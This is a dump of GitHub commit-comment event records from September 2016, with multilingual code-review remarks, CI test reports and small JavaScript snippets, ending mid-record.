{"id":"4500037220","type":"CommitCommentEvent","actor":{"login":"Bogdan-G"},"repo":{"name":"Blood-Asp/GT5-Unofficial"},"payload":{"comment":{"id":18856845,"position":null,"line":null,"path":null,"commit_id":"b4049e88a269b5def8d3335aec566dcfc387a26b","created_at":"2016-09-01T02:03:40Z","updated_at":"2016-09-01T02:03:40Z","body":"do not forget that the slow TC/TCAPI"}},"created_at":"2016-09-01T02:03:40Z"}
{"id":"4500037531","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"rtaykowski/homework-landingpage"},"payload":{"comment":{"id":18856846,"position":37,"line":37,"path":"Assignment/javascript-code/js/script.js","commit_id":"9e179c44587f1706a1de1cabf3ae549c9cbed1aa","created_at":"2016-09-01T02:03:47Z","updated_at":"2016-09-01T02:03:47Z","body":"The jQuery `.slideDown()` method does the same thing as `.show()`, but with so you do not need to do both on for the same element."}},"created_at":"2016-09-01T02:03:47Z"}
{"id":"4500041983","type":"CommitCommentEvent","actor":{"login":"vramana"},"repo":{"name":"pragyes31/FreeCodeCamp"},"payload":{"comment":{"id":18856853,"position":15,"line":15,"path":"twitchtv/index.html","commit_id":"04a4cf378593e2fb584455b4512e979ef146a57a","created_at":"2016-09-01T02:05:24Z","updated_at":"2016-09-01T02:05:24Z","body":"Wrong indentation\r\n"}},"created_at":"2016-09-01T02:05:24Z"}
{"id":"4500042617","type":"CommitCommentEvent","actor":{"login":"vramana"},"repo":{"name":"pragyes31/FreeCodeCamp"},"payload":{"comment":{"id":18856854,"position":33,"line":33,"path":"twitchtv/index.html","commit_id":"04a4cf378593e2fb584455b4512e979ef146a57a","created_at":"2016-09-01T02:05:38Z","updated_at":"2016-09-01T02:05:38Z","body":"Wrong Indentation\r\n"}},"created_at":"2016-09-01T02:05:38Z"}
{"id":"4500043059","type":"CommitCommentEvent","actor":{"login":"vramana"},"repo":{"name":"pragyes31/FreeCodeCamp"},"payload":{"comment":{"id":18856855,"position":39,"line":39,"path":"twitchtv/index.html","commit_id":"04a4cf378593e2fb584455b4512e979ef146a57a","created_at":"2016-09-01T02:05:47Z","updated_at":"2016-09-01T02:05:47Z","body":"Wrong Indentation"}},"created_at":"2016-09-01T02:05:47Z"}
{"id":"4500044741","type":"CommitCommentEvent","actor":{"login":"vramana"},"repo":{"name":"pragyes31/FreeCodeCamp"},"payload":{"comment":{"id":18856856,"position":7,"line":7,"path":"twitchtv/style.css","commit_id":"04a4cf378593e2fb584455b4512e979ef146a57a","created_at":"2016-09-01T02:06:27Z","updated_at":"2016-09-01T02:06:27Z","body":"Inconsistent indentation all over the place. Use 4 spaces consistent."}},"created_at":"2016-09-01T02:06:27Z"}
{"id":"4500045131","type":"CommitCommentEvent","actor":{"login":"Jetski5822"},"repo":{"name":"OrchardCMS/Orchard2"},"payload":{"comment":{"id":18856860,"position":null,"line":null,"path":null,"commit_id":"d769488a7325e2cfcddba95cd4fa007fe62f5f1c","created_at":"2016-09-01T02:06:36Z","updated_at":"2016-09-01T02:06:36Z","body":"Maybe form group and form label etc should be tag helpers?"}},"created_at":"2016-09-01T02:06:36Z"}
{"id":"4500049168","type":"CommitCommentEvent","actor":{"login":"jjethwa"},"repo":{"name":"jjethwa/rundeck"},"payload":{"comment":{"id":18856868,"position":null,"line":null,"path":null,"commit_id":"3358ff8e43429a634d619123a2c26aaaacb20e5e","created_at":"2016-09-01T02:08:04Z","updated_at":"2016-09-01T02:08:04Z","body":"Hi @mcarltzu \r\n\r\nAwesome!  Hope it comes in handy and I look forward to a pull request from you one day hehe"}},"created_at":"2016-09-01T02:08:04Z"}
{"id":"4500049251","type":"CommitCommentEvent","actor":{"login":"longyzkd"},"repo":{"name":"longyzkd/wj-simple-android-front"},"payload":{"comment":{"id":18856869,"position":null,"line":null,"path":null,"commit_id":"4cd477c9908af6a8662e23deca989ea8e6da250e","created_at":"2016-09-01T02:08:06Z","updated_at":"2016-09-01T02:08:06Z","body":"wj-simple-android-back 的前台安卓"}},"created_at":"2016-09-01T02:08:06Z"}
{"id":"4500049570","type":"CommitCommentEvent","actor":{"login":"hanlingling"},"repo":{"name":"hanlingling/09c"},"payload":{"comment":{"id":18856870,"position":null,"line":null,"path":null,"commit_id":"5902624790fe8d818e016dc3d45ef57ac016b352","created_at":"2016-09-01T02:08:12Z","updated_at":"2016-09-01T02:08:12Z","body":"这是第一个文件"}},"created_at":"2016-09-01T02:08:12Z"}
{"id":"4500053737","type":"CommitCommentEvent","actor":{"login":"mcarltzu"},"repo":{"name":"jjethwa/rundeck"},"payload":{"comment":{"id":18856872,"position":null,"line":null,"path":null,"commit_id":"3358ff8e43429a634d619123a2c26aaaacb20e5e","created_at":"2016-09-01T02:09:51Z","updated_at":"2016-09-01T02:09:51Z","body":"Oh wait. One last thing. I was moved to a new project today. Cant continue to modify the repo :sob: Gonna leave the docker world atm :sob:"}},"created_at":"2016-09-01T02:09:51Z"}
{"id":"4500056212","type":"CommitCommentEvent","actor":{"login":"mlspinylobster"},"repo":{"name":"onnfetuya/sanmoku"},"payload":{"comment":{"id":18856876,"position":50,"line":23,"path":"sanmoku.rb","commit_id":"eb43ea79a407f1eb481f4cf7d3de72ad7eed6608","created_at":"2016-09-01T02:10:45Z","updated_at":"2016-09-01T02:10:45Z","body":"ここだけど、loopの中に入れたらダメなのかな？"}},"created_at":"2016-09-01T02:10:45Z"}
{"id":"4500056299","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"rtaykowski/homework-landingpage"},"payload":{"comment":{"id":18856877,"position":null,"line":null,"path":null,"commit_id":"9e179c44587f1706a1de1cabf3ae549c9cbed1aa","created_at":"2016-09-01T02:10:47Z","updated_at":"2016-09-01T02:10:47Z","body":"Overall, very well done!"}},"created_at":"2016-09-01T02:10:47Z"}
{"id":"4500059729","type":"CommitCommentEvent","actor":{"login":"xiaosa65"},"repo":{"name":"Six-demo/enzi"},"payload":{"comment":{"id":18856886,"position":null,"line":null,"path":null,"commit_id":"2f9572fd5655bcaad17de605c17a6fed5a05b253","created_at":"2016-09-01T02:12:05Z","updated_at":"2016-09-01T02:12:05Z","body":"测试"}},"created_at":"2016-09-01T02:12:05Z"}
{"id":"4500061006","type":"CommitCommentEvent","actor":{"login":"Sn0wCrack"},"repo":{"name":"Sn0wCrack/ExHentai-Archive"},"payload":{"comment":{"id":18856888,"position":null,"line":null,"path":null,"commit_id":"dd24e873bf30a33ccb6637e89359995d3e5414bc","created_at":"2016-09-01T02:12:19Z","updated_at":"2016-09-01T02:12:19Z","body":"I've got a fix working already, about to push a commit.\r\nIt'll require a slightly newer sphinx.conf, so re-indexing is required. "}},"created_at":"2016-09-01T02:12:19Z"}
{"id":"4500066342","type":"CommitCommentEvent","actor":{"login":"jjethwa"},"repo":{"name":"jjethwa/rundeck"},"payload":{"comment":{"id":18856897,"position":null,"line":null,"path":null,"commit_id":"3358ff8e43429a634d619123a2c26aaaacb20e5e","created_at":"2016-09-01T02:14:18Z","updated_at":"2016-09-01T02:14:18Z","body":"Maybe you can help Docker'ize the new project :wink: "}},"created_at":"2016-09-01T02:14:18Z"}
{"id":"4500067370","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"allisonhall/homework-landingpage"},"payload":{"comment":{"id":18856902,"position":1,"line":1,"path":"Assignment 4/starter_code/js/index.js","commit_id":"15926417897d8cbb2d4124406acedb47b256a657","created_at":"2016-09-01T02:14:41Z","updated_at":"2016-09-01T02:14:41Z","body":"Excellent job leaving comments!"}},"created_at":"2016-09-01T02:14:41Z"}
{"id":"4500068322","type":"CommitCommentEvent","actor":{"login":"gera2ld"},"repo":{"name":"intellilab/translator.user.js"},"payload":{"comment":{"id":18856904,"position":null,"line":null,"path":null,"commit_id":"69617214e66ec4402638d2d376389ed012c98cee","created_at":"2016-09-01T02:15:00Z","updated_at":"2016-09-01T02:15:00Z","body":"有道理，这个很有必要"}},"created_at":"2016-09-01T02:15:00Z"}
{"id":"4500072483","type":"CommitCommentEvent","actor":{"login":"junxxx"},"repo":{"name":"junxxx/laravelblog"},"payload":{"comment":{"id":18856908,"position":9,"line":9,"path":"app/Backend.php","commit_id":"ccedac3e46c38d04f80f10beb7244c8f69ee389c","created_at":"2016-09-01T02:16:26Z","updated_at":"2016-09-01T02:16:26Z","body":"评论？"}},"created_at":"2016-09-01T02:16:26Z"}
{"id":"4500073173","type":"CommitCommentEvent","actor":{"login":"mcarltzu"},"repo":{"name":"jjethwa/rundeck"},"payload":{"comment":{"id":18856910,"position":null,"line":null,"path":null,"commit_id":"3358ff8e43429a634d619123a2c26aaaacb20e5e","created_at":"2016-09-01T02:16:41Z","updated_at":"2016-09-01T02:16:41Z","body":"Might work. Perhaps :smiley: "}},"created_at":"2016-09-01T02:16:41Z"}
{"id":"4500080227","type":"CommitCommentEvent","actor":{"login":"gdsh954"},"repo":{"name":"gdsh954/dubbo"},"payload":{"comment":{"id":18856921,"position":null,"line":null,"path":null,"commit_id":"d4d2f4650bc63c6544f143dc363c81f094c35aea","created_at":"2016-09-01T02:19:14Z","updated_at":"2016-09-01T02:19:14Z","body":"支持不同终端重启监控服务 "}},"created_at":"2016-09-01T02:19:14Z"}
{"id":"4500085720","type":"CommitCommentEvent","actor":{"login":"durhamka"},"repo":{"name":"KatieRiley/Bloc-jams"},"payload":{"comment":{"id":18856929,"position":30,"line":30,"path":"scripts/landing.js","commit_id":"464146edc23bac9e0ff41a5b4a8352abbc906b4f","created_at":"2016-09-01T02:21:22Z","updated_at":"2016-09-01T02:21:22Z","body":"watch extra spacing and indetations"}},"created_at":"2016-09-01T02:21:22Z"}
{"id":"4500098896","type":"CommitCommentEvent","actor":{"login":"xixart"},"repo":{"name":"nb-gandhi/WorldOfSigns"},"payload":{"comment":{"id":18856948,"position":null,"line":null,"path":null,"commit_id":"02766b3747f800b265250e7609149a157cfe3083","created_at":"2016-09-01T02:26:20Z","updated_at":"2016-09-01T02:26:20Z","body":"Running application (on anroid 4.4.2).  Unfortunately, World Of Signs has stopped. Help please."}},"created_at":"2016-09-01T02:26:20Z"}
{"id":"4500102952","type":"CommitCommentEvent","actor":{"login":"tomoyuen"},"repo":{"name":"terranc/LFUI"},"payload":{"comment":{"id":18856952,"position":null,"line":null,"path":null,"commit_id":"230a84a935a594b33000d49587afc49a1084a8d0","created_at":"2016-09-01T02:27:55Z","updated_at":"2016-09-01T02:27:55Z","body":"现在把大量的逻辑写到了html里，看起来改起来都比较烦，问题也比较难发现，后面我整理下，写到方法里吧"}},"created_at":"2016-09-01T02:27:55Z"}
{"id":"4500103545","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"allisonhall/homework-landingpage"},"payload":{"comment":{"id":18856953,"position":27,"line":27,"path":"Assignment 4/starter_code/js/index.js","commit_id":"15926417897d8cbb2d4124406acedb47b256a657","created_at":"2016-09-01T02:28:10Z","updated_at":"2016-09-01T02:28:10Z","body":"Your code is looking very clean, one minor note on indentation - the bottom line of the function should be lined up with the top line of the function, so the last two lines of the above function should be tabbed back like so:\r\n```\r\n$('.learn-more').click(function(){ \r\n  $('#learn-more-text').slideDown(); \r\n  $('.learn-more').hide(); \r\n  event.preventDefault();\r\n});\r\n```"}},"created_at":"2016-09-01T02:28:10Z"}
{"id":"4500106801","type":"CommitCommentEvent","actor":{"login":"Brooooooklyn"},"repo":{"name":"teambition/teambition-sdk"},"payload":{"comment":{"id":18856956,"position":7,"line":28,"path":"src/models/ProjectModel.ts","commit_id":"ea4f8e63296c97fd0b1f754b892574f440fc546e","created_at":"2016-09-01T02:29:30Z","updated_at":"2016-09-01T02:29:30Z","body":"这里最好用 !data._organizationId"}},"created_at":"2016-09-01T02:29:30Z"}
{"id":"4500107900","type":"CommitCommentEvent","actor":{"login":"iceboy-sjtu"},"repo":{"name":"vijos/vj4"},"payload":{"comment":{"id":18856962,"position":null,"line":null,"path":null,"commit_id":"402a77d2a316bdab1437dd2f69f990827c5586d6","created_at":"2016-09-01T02:29:57Z","updated_at":"2016-09-01T02:29:57Z","body":"Use what? I think the proxy is not owned by us, and the code is AGPL."}},"created_at":"2016-09-01T02:29:57Z"}
{"id":"4500112074","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu-book"},"payload":{"comment":{"id":18856969,"position":6,"line":17,"path":"en/source/packet_lib.rst","commit_id":"9de74a9ac2f144ec9cf2e12367ce984833b30a54","created_at":"2016-09-01T02:31:31Z","updated_at":"2016-09-01T02:31:31Z","body":"`used mainly in OpenFlow.`\r\n「OpenFlow においてよく使われる」\r\nとありますが、本当ですか？根拠となるものはありますでしょうか？"}},"created_at":"2016-09-01T02:31:31Z"}
{"id":"4500112764","type":"CommitCommentEvent","actor":{"login":"terranc"},"repo":{"name":"terranc/LFUI"},"payload":{"comment":{"id":18856970,"position":null,"line":null,"path":null,"commit_id":"230a84a935a594b33000d49587afc49a1084a8d0","created_at":"2016-09-01T02:31:46Z","updated_at":"2016-09-01T02:31:46Z","body":"@tomoyuen 可以总结vue这种把逻辑放在html的行为之适合做简单的if else处理，并不见得利于维护"}},"created_at":"2016-09-01T02:31:46Z"}
{"id":"4500115244","type":"CommitCommentEvent","actor":{"login":"15617417106"},"repo":{"name":"15617417106/07RE"},"payload":{"comment":{"id":18856975,"position":null,"line":null,"path":null,"commit_id":"b6c3c22c913e2f47d632561b9aa62066d7477b6b","created_at":"2016-09-01T02:32:36Z","updated_at":"2016-09-01T02:32:36Z","body":"看，名"}},"created_at":"2016-09-01T02:32:36Z"}
{"id":"4500118991","type":"CommitCommentEvent","actor":{"login":"kumarvastav"},"repo":{"name":"Bahmni/bahmni-gauge"},"payload":{"comment":{"id":18856988,"position":300,"line":171,"path":"bahmni-gauge-commons/src/main/java/org/bahmni/gauge/common/program/ProgramManagementPage.java","commit_id":"94bbef9f1522bdf512fd8b5ab487d8fd754c7339","created_at":"2016-09-01T02:34:00Z","updated_at":"2016-09-01T02:34:00Z","body":"Use waitForElementOnPage method under Bahmni page\n\nOn Thu, 1 Sep 2016 at 1:26 AM, Swarup Kumar Mahapatra <\nnotifications@github.com> wrote:\n\n> I think waitForSpinner() will be valid only if the page is rendered again\n> and spinner is displayed.. In this case a popup is coming up, so I guess\n> the page doesn't renders again, so one should wait for pop-up\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Bahmni/bahmni-gauge/commit/94bbef9f1522bdf512fd8b5ab487d8fd754c7339#commitcomment-18851514>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AMXVVn76BhBPzTkcaemZhribWhoRjfS7ks5qlcLygaJpZM4Jxldx>\n> .\n>\n"}},"created_at":"2016-09-01T02:34:00Z"}
{"id":"4500122863","type":"CommitCommentEvent","actor":{"login":"Sunako"},"repo":{"name":"Sn0wCrack/ExHentai-Archive"},"payload":{"comment":{"id":18856996,"position":null,"line":null,"path":null,"commit_id":"3211ef12957ba4b4e18f3d60024c86b8f1fd83ed","created_at":"2016-09-01T02:35:30Z","updated_at":"2016-09-01T02:35:30Z","body":"What do you mean by a tool for the orphaned gallery_tag entries? Is the cleanup task not already deleting them with this commit? Looks to be as I have something like 150k NULL gallery_id entries."}},"created_at":"2016-09-01T02:35:30Z"}
{"id":"4500125669","type":"CommitCommentEvent","actor":{"login":"ROBSONCARLOS86"},"repo":{"name":"ROBSONCARLOS86/C-Program-Files-x86-EasyPHP-DevServer-14.1VC9-data-localweb"},"payload":{"comment":{"id":18857005,"position":null,"line":null,"path":null,"commit_id":"b08c6c909d90d853f8dbf140065dcc1ea6fb352b","created_at":"2016-09-01T02:36:30Z","updated_at":"2016-09-01T02:36:30Z","body":"trabalho"}},"created_at":"2016-09-01T02:36:30Z"}
{"id":"4500130709","type":"CommitCommentEvent","actor":{"login":"shelru"},"repo":{"name":"shelru/ExtraMirror"},"payload":{"comment":{"id":18857024,"position":null,"line":null,"path":null,"commit_id":"0a1a2608943bc3d2f1aa7cce33621ce007fcb81e","created_at":"2016-09-01T02:38:22Z","updated_at":"2016-09-01T02:38:22Z","body":"Fixed crashes when ini file don't found"}},"created_at":"2016-09-01T02:38:22Z"}
{"id":"4500130856","type":"CommitCommentEvent","actor":{"login":"ishwarkumar2012"},"repo":{"name":"ishwarkumar2012/laravel-crud"},"payload":{"comment":{"id":18857026,"position":null,"line":null,"path":null,"commit_id":"40003798253fc4e24cdcac78bca7d74eb2adb36c","created_at":"2016-09-01T02:38:25Z","updated_at":"2016-09-01T02:38:25Z","body":"This was a test commit"}},"created_at":"2016-09-01T02:38:25Z"}
{"id":"4500134361","type":"CommitCommentEvent","actor":{"login":"adamschwartz"},"repo":{"name":"EagerIO/EmbedBox"},"payload":{"comment":{"id":18857036,"position":5,"line":192,"path":"app/embed-box-base.js","commit_id":"cddb8ac14ed1d4fe8e28e3031642b2d27136c157","created_at":"2016-09-01T02:39:46Z","updated_at":"2016-09-01T02:39:46Z","body":"what's this all aboot?"}},"created_at":"2016-09-01T02:39:46Z"}
{"id":"4500134648","type":"CommitCommentEvent","actor":{"login":"adamschwartz"},"repo":{"name":"EagerIO/EmbedBox"},"payload":{"comment":{"id":18857037,"position":null,"line":null,"path":null,"commit_id":"cddb8ac14ed1d4fe8e28e3031642b2d27136c157","created_at":"2016-09-01T02:39:53Z","updated_at":"2016-09-01T02:39:53Z","body":"mmmm, makes sense. i'm guessing this has to do with flex as well."}},"created_at":"2016-09-01T02:39:53Z"}
{"id":"4500134938","type":"CommitCommentEvent","actor":{"login":"adamschwartz"},"repo":{"name":"EagerIO/EmbedBox"},"payload":{"comment":{"id":18857038,"position":null,"line":null,"path":null,"commit_id":"cddb8ac14ed1d4fe8e28e3031642b2d27136c157","created_at":"2016-09-01T02:39:59Z","updated_at":"2016-09-01T02:39:59Z","body":"👍 great fix!!!"}},"created_at":"2016-09-01T02:39:59Z"}
{"id":"4500139924","type":"CommitCommentEvent","actor":{"login":"chomado"},"repo":{"name":"chomado/xamarin-dev-doc"},"payload":{"comment":{"id":18857060,"position":10,"line":86,"path":"hands-on/readme.md","commit_id":"8446f14cae86f88d110b0650d92abcb9ff58bbfb","created_at":"2016-09-01T02:41:47Z","updated_at":"2016-09-01T02:41:47Z","body":"atsushienoさんより先に nuits_jp さんから FB でコメントもらってて、ここで書いた！\r\nhttps://github.com/chomado/xamarin-dev-doc/commit/e4f1891176dbf42b4847769e17715ec2bf0df871\r\nありぽっぽ～"}},"created_at":"2016-09-01T02:41:47Z"}
{"id":"4500142560","type":"CommitCommentEvent","actor":{"login":"huan086"},"repo":{"name":"ansman/validate.js"},"payload":{"comment":{"id":18857069,"position":null,"line":null,"path":null,"commit_id":"cffa61aa0e3f33aee3fa4ad57f6c8f6f9c3f233a","created_at":"2016-09-01T02:42:44Z","updated_at":"2016-09-01T02:42:44Z","body":"Oh wait, I realized that's not all.\r\n\r\nHostname match is now\r\n\r\n`(?:(?:[a-z\\\\u00a1-\\\\uffff0-9]-*)*[a-z\\\\u00a1-\\\\uffff0-9]+)`\r\n\r\ninstead of\r\n\r\n`(?:(?:[a-z\\\\u00a1-\\\\uffff0-9]+-?)*[a-z\\\\u00a1-\\\\uffff0-9]+)`\r\n\r\nwhich solves the [catastrophic backtracking problem](gistcomment-1252604) by removing the `+`, and also [supports `http://g--a.com`](gistcomment-1296879)\r\n\r\nIt would be wise to update the entire regex in order to get all the fixes"}},"created_at":"2016-09-01T02:42:44Z"}
{"id":"4500144619","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu-book"},"payload":{"comment":{"id":18857070,"position":6,"line":17,"path":"en/source/packet_lib.rst","commit_id":"9de74a9ac2f144ec9cf2e12367ce984833b30a54","created_at":"2016-09-01T02:43:32Z","updated_at":"2016-09-01T02:43:32Z","body":"OpenFlowで使われるかの根拠はなく、文章の作成上「OpenFlowにおいて」という表現を使用してしまいました。\r\n以下の様に修正します。\r\n```\r\nThe following protocols are used frequently.\r\n```"}},"created_at":"2016-09-01T02:43:32Z"}
{"id":"4500146891","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18857075,"position":null,"line":null,"path":null,"commit_id":"34cf667ef26cea90003b336fbb2fbf9e2580bbee","created_at":"2016-09-01T02:44:24Z","updated_at":"2016-09-01T02:44:24Z","body":"113835831-Source-Temp-Not-Reporting (mjwitte) - Win64-Windows-7-VisualStudio-12: OK (2331 of 2333 tests passed, 24 test warnings)\n\n * 25 tests had: AUD diffs.\n * 25 tests had: RDD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34cf667ef26cea90003b336fbb2fbf9e2580bbee-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34cf667ef26cea90003b336fbb2fbf9e2580bbee-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.91%25-yellow.svg)</a> \n"}},"created_at":"2016-09-01T02:44:24Z"}
{"id":"4500152140","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18857103,"position":null,"line":null,"path":null,"commit_id":"78d0f3815ba4e8a93459d4055f2bf8bc34a7a977","created_at":"2016-09-01T02:46:20Z","updated_at":"2016-09-01T02:46:20Z","body":"Related to: backdrop/backdrop-issues#1489 "}},"created_at":"2016-09-01T02:46:20Z"}
{"id":"4500152749","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"ovanegas6/homework-landingpage"},"payload":{"comment":{"id":18857105,"position":16,"line":16,"path":"Assignment/starter_code/js/index.js","commit_id":"c88235e719657c207f4200abad4734d02ad8d35e","created_at":"2016-09-01T02:46:35Z","updated_at":"2016-09-01T02:46:35Z","body":"Great job using specific names and camel case for your function names"}},"created_at":"2016-09-01T02:46:35Z"}
{"id":"4500156237","type":"CommitCommentEvent","actor":{"login":"JikkuJose"},"repo":{"name":"jinnujohnson/Square"},"payload":{"comment":{"id":18857109,"position":70,"line":58,"path":"01-lets_get_started/01.cpp","commit_id":"c1f22f6e1ddd1718f0b93d6ba9161b60c9ca223e","created_at":"2016-09-01T02:47:52Z","updated_at":"2016-09-01T02:47:52Z","body":"Indentation is wrong here"}},"created_at":"2016-09-01T02:47:52Z"}
{"id":"4500157120","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18857111,"position":null,"line":null,"path":null,"commit_id":"93027689f49c4d9ad751e2baea8fb49dcdfb92a9","created_at":"2016-09-01T02:48:11Z","updated_at":"2016-09-01T02:48:11Z","body":"Related to: backdrop/backdrop-issues#1435 "}},"created_at":"2016-09-01T02:48:11Z"}
{"id":"4500159015","type":"CommitCommentEvent","actor":{"login":"gnarizzy"},"repo":{"name":"gnarizzy/circa"},"payload":{"comment":{"id":18857118,"position":null,"line":null,"path":null,"commit_id":"69655d1f3de2dbca4e312f15013fe34d6571d49c","created_at":"2016-09-01T02:48:52Z","updated_at":"2016-09-01T02:48:52Z","body":"Your first Circa commit :')"}},"created_at":"2016-09-01T02:48:52Z"}
{"id":"4500160500","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18857125,"position":null,"line":null,"path":null,"commit_id":"21e878b3ae76dbf54b651250f5230f4ac7a229b3","created_at":"2016-09-01T02:49:25Z","updated_at":"2016-09-01T02:49:25Z","body":"5626-Plant-HX-min-DT (EnergyArchmage) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1760 of 1761 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-21e878b3ae76dbf54b651250f5230f4ac7a229b3-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-21e878b3ae76dbf54b651250f5230f4ac7a229b3-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-21e878b3ae76dbf54b651250f5230f4ac7a229b3-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.9%25-green.svg)</a>\n"}},"created_at":"2016-09-01T02:49:25Z"}
{"id":"4500160757","type":"CommitCommentEvent","actor":{"login":"gnarizzy"},"repo":{"name":"gnarizzy/circa"},"payload":{"comment":{"id":18857127,"position":null,"line":null,"path":null,"commit_id":"773dd233ac4feb6231b350eb0ad7cbd6691d32bd","created_at":"2016-09-01T02:49:32Z","updated_at":"2016-09-01T02:49:32Z","body":"Your final Circa commit :'("}},"created_at":"2016-09-01T02:49:32Z"}
{"id":"4500162919","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"ovanegas6/homework-landingpage"},"payload":{"comment":{"id":18857132,"position":null,"line":null,"path":null,"commit_id":"c88235e719657c207f4200abad4734d02ad8d35e","created_at":"2016-09-01T02:50:19Z","updated_at":"2016-09-01T02:50:19Z","body":"You did a great job adding to your existing code. One thing to think about for next time is using classes instead of ids to reduce the amount of code you need to write. For example, instead of writing an id `#read-blog1` and `#read-blog2` you can try a class `.read-blog`, and then you only need to have one event handler. If you use classes you could have as many blog posts as you want and they can all use the same function."}},"created_at":"2016-09-01T02:50:19Z"}
{"id":"4500164939","type":"CommitCommentEvent","actor":{"login":"green-coder"},"repo":{"name":"modesttree/Zenject"},"payload":{"comment":{"id":18857141,"position":null,"line":null,"path":null,"commit_id":"652870696b7ce2335f1cd5bb005dab43617185c2","created_at":"2016-09-01T02:51:03Z","updated_at":"2016-09-01T02:51:03Z","body":"Nice ! That's a bug that have been bothering me a lot, I was working around it via `FromMethod` and then manually resolving using the container."}},"created_at":"2016-09-01T02:51:03Z"}
{"id":"4500168881","type":"CommitCommentEvent","actor":{"login":"xilin"},"repo":{"name":"CoderMJLee/MJRefresh"},"payload":{"comment":{"id":18857152,"position":22,"line":291,"path":"MJRefreshExample/Classes/Second/MJTableViewController.m","commit_id":"42f6ad76e9a2e130973ba78dd1ee4b9d21f62e0a","created_at":"2016-09-01T02:52:36Z","updated_at":"2016-09-01T02:52:36Z","body":"GCD这种block不会有循环引用问题，不需要加weak吧"}},"created_at":"2016-09-01T02:52:36Z"}
{"id":"4500169779","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18857155,"position":null,"line":null,"path":null,"commit_id":"34cf667ef26cea90003b336fbb2fbf9e2580bbee","created_at":"2016-09-01T02:52:55Z","updated_at":"2016-09-01T02:52:55Z","body":"113835831-Source-Temp-Not-Reporting (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34cf667ef26cea90003b336fbb2fbf9e2580bbee-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-01T02:52:55Z"}
{"id":"4500175221","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"ovanegas6/homework-landingpage"},"payload":{"comment":{"id":18857160,"position":5,"line":5,"path":"Assignment/starter_code/js/index.js","commit_id":"c88235e719657c207f4200abad4734d02ad8d35e","created_at":"2016-09-01T02:55:00Z","updated_at":"2016-09-01T02:55:00Z","body":"Great job thinking about how to hide elements. Next time perhaps try doing this in CSS. When you do it in the `$.ready()` function the DOM is fully loading and then you are hiding it. Since we want it hidden on load, you may think about a CSS class 'none' with `display: none;` that you can apply to all the elements you want hidden by default."}},"created_at":"2016-09-01T02:55:00Z"}
{"id":"4500176360","type":"CommitCommentEvent","actor":{"login":"zachlittle"},"repo":{"name":"zachlittle/sourceclub"},"payload":{"comment":{"id":18857164,"position":null,"line":null,"path":null,"commit_id":"80ae9d399b2c0c152c5feed4f29f46b3fa27f27f","created_at":"2016-09-01T02:55:28Z","updated_at":"2016-09-01T02:55:28Z","body":"Ayye the codegoat :]"}},"created_at":"2016-09-01T02:55:28Z"}
{"id":"4500178087","type":"CommitCommentEvent","actor":{"login":"vshekharjha"},"repo":{"name":"CreativeDream/jQuery.filer"},"payload":{"comment":{"id":18857166,"position":null,"line":null,"path":null,"commit_id":"c50df8f2a633a0eb8452fc3ea8c0d533b483aa71","created_at":"2016-09-01T02:56:09Z","updated_at":"2016-09-01T02:56:09Z","body":"yes you can do that!!\r\non click or drag file inside the input section call validFile function which will create event and create temporary ajaxData list of file and then on send it through ajax\r\n\r\n\r\n```\r\nfunction validFile(finput, event) {\r\n    var validFileCounter = 0;\r\n    if (!event) {\r\n        event = window.event;\r\n    }\r\n```\r\n    var x = event.target || event.srcElement;\r\n    files = x.files;\r\n    console.log(files);\r\n    fileUploading(finput);\r\n}\r\n```\r\nfunction fileUploading(finput) {\r\n    var oMyForm = new FormData();\r\n    oMyForm.append(\"file\", files[0]);\r\n    ajaxData.append('file', 